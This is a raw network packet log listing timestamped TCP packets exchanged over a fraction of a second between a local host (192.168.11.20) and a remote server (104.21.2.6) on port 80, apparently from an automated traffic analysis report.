                                                                    Nov 28, 2022 16:37:04.197771072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.197781086 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.197948933 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.198054075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198117971 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.198157072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198204041 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198215961 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198226929 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198239088 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198250055 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198261023 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198272943 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198283911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198287964 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.198302031 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198313951 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198324919 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198335886 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198348045 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198359966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198370934 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198381901 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198394060 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198405027 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198416948 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198427916 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198438883 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198457003 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198462009 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.198477983 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198489904 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198508024 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198528051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198549032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198570013 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198582888 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198595047 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198606014 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.198627949 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.198800087 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.198800087 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.199023962 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199105024 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199167967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199182987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199194908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199208021 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199210882 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.199225903 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199265003 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199278116 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199290037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199302912 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199315071 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199326992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199338913 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199352026 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199363947 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199376106 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199382067 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.199382067 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.199414968 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199426889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199440002 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199451923 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199476004 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199491024 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199512005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199525118 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199536085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199547052 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199549913 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.199549913 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.199565887 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199578047 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199589014 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199600935 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199611902 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199624062 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.199723005 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.199889898 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.199990988 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200105906 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200155973 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200169086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200181007 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200193882 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200206041 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200218916 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200231075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200242996 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200256109 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200268984 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200278997 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.200278997 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.200288057 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200300932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200351954 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200364113 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200375080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200388908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200429916 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200450897 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.200458050 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200472116 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200484037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200495005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200505972 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200517893 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200529099 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200540066 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200551987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200562000 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.200651884 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.200651884 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.200813055 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.200958967 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.206931114 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207032919 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207077026 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.207106113 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207118988 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207129955 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207143068 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207154036 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207165956 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207178116 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207190037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207201004 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207212925 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207225084 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207237005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207256079 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207271099 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.207271099 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.207292080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207307100 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207319021 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207330942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207343102 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207355022 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207365990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207377911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207390070 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207401991 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207412004 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207423925 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207436085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207438946 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.207453012 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207464933 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207477093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207488060 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207499981 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207530022 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207541943 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207554102 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207576990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207588911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207601070 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207612038 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.207623959 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207640886 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207652092 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207663059 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207674026 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207684040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207695007 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207705975 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207753897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207781076 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.207781076 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.207825899 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207848072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207861900 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207873106 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207911968 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.207992077 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.207992077 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.208033085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208084106 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208111048 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208125114 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208137035 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208149910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208162069 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.208162069 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.208194971 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208208084 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208220005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208233118 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208245993 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208257914 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208270073 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208281994 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208295107 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208316088 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208331108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208333015 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.208348036 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208359003 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208370924 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208381891 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208393097 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208404064 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208415985 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208425045 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.208502054 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.208502054 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.208659887 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.208659887 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.208828926 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.209788084 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.209906101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.209918022 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.209932089 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.209960938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.209973097 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.209975004 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.209988117 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210000992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210011959 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210035086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210046053 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210057020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210067987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210078001 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210088968 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210099936 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210118055 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210138083 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210145950 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.210145950 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.210170031 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210181952 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210191965 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210202932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210213900 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210225105 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210235119 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210243940 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210254908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210266113 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210277081 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210288048 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210299015 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210308075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210311890 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.210324049 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210376978 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210387945 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210398912 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210454941 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210469007 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210485935 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.210495949 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210516930 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210531950 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210541964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210552931 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210563898 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210573912 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210585117 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210594893 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210606098 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210617065 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210627079 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210638046 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210649967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210658073 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.210658073 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.210658073 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.210658073 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.210690022 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210711956 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210725069 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210736036 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.210864067 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.210864067 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.211035967 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.225711107 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.225775003 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.225811005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.225831032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.225846052 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.225886106 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.225888968 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.225904942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.225922108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.225936890 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.226011038 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.226181030 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.231309891 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231408119 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231460094 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231472015 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231484890 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231498957 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231511116 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231523037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231534958 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231548071 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231559992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231578112 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231604099 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231615067 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231626987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231657028 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231661081 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.231710911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231723070 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231734037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231745958 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231764078 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231784105 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231806040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231822014 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231826067 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.231826067 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.231843948 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231856108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231868029 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231879950 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231892109 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231904984 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231916904 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231929064 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231940985 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231952906 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231965065 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231976032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.231995106 CET4983080192.168.11.20104.21.2.6
